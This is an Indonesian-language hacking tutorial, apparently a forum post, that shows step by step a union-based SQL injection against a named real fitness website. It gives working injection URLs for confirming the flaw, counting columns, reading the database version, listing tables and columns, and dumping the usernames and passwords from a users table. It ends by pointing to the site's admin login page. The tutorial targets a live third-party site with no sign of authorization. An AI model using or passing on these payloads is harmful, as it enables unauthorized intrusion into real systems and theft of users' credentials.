SQL Injection for v5

== START ==
Code: http://www.fitnessthailand.co.th/activities_01.php?activity_id=31
Web diatas berjalan Normal
Wokeh skrg...qta Tambahkan penyedap rasa --> " - "
Code : http://www.fitnessthailand.co.th/activities_01.php?activity_id='31
Web Blank/kosong/Error berarti "Vuln Sql Injection"
Sekarang kita lanjutkan dengan mengecek jumlah kolom dari web ini dengan perintah "order by". Disini kita harus mengurutkan angka "1" sampai akhir hingga menampilkan error seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+1--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+2--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+3--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+4--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+5--
normal
Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+6--
UpZz..Web Blank konten menjadi hilang/error lagi. Ini berarti kolom hanya ada 5 karena 6 tidak tersedia
NB : Perlu di ingat pengurutan ini dimulai dari angka 1 sampai tampilan error/blank, dan seterus'y. Hadooh Capek...ngaso dulu agh !!!



Setelah itu kita mengecek kolom yang bermasalah dengan perintah "union all select" atau "union select" seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,3,4,5--

Oh iya kita harus menambahkan tanda min " - " pada akhir id content seperti ini: "activity_id=-31"

Setelah itu akan muncul tampilan yang menampilkan kolom yang bermasalah seperti ini :


Muncul angka 2 & 3 yang tebal seperti diatas, angka inilah yang nantinya kita gunakan sebagai referensi.
Sekarang kita mengecek versi dari MySQL yang dipakai di web ini dengan menambahkan sintak "version()" atau "@@version" pada kolom yang bermasalah tadi seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,version(),4,5--
Akan muncul versi dari MySQL yang dipakai seperti ini :



Sekarang kita lanjutkan dengan menampilkan table-table dengan perintah "...group_concat(table_name)...+from+information_schema.tables+where+table_schema=database()" seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()
Akan muncul table-table seperti ini:



Setelah table sudah ada sekarang kita akan mengeluarkan column dari table tersebut dengan perintah "...group_concat(column_name)...+information_schema.columns+where+table_name=[nama hex sql table], pilihlah table yang akan ditampilkan column nya, disini ane memilih table tbl_users seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x74626c5f7573657273

0x74626c5f7573657273 <--tbl_user setelah di mysql hex encode. Untuk meng-convert menjadi mysql hex dapat menggunakan web ini: http://www.waraxe.us/sql-char-encoder.html

Kemudian column-column akan muncul seperti ini:



Sekarang kita akan mengeluarkan isi dari column c_username dan c_password dengan perintah "...group_concat([namakolom yang diinginkan],0x3a,[namakolom yang diinginkan])...+from+[nama tabel]-- seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(c_username,0x3a,c_password,0x3a),4,5+from+t ?bl_users--
Dan akan menampilkan isi dari kolom tersebut seperti ini :
Terakhir Tgl cari halaman admin'y.
halaman admin --> http://www.fitnessthailand.co.th/admin/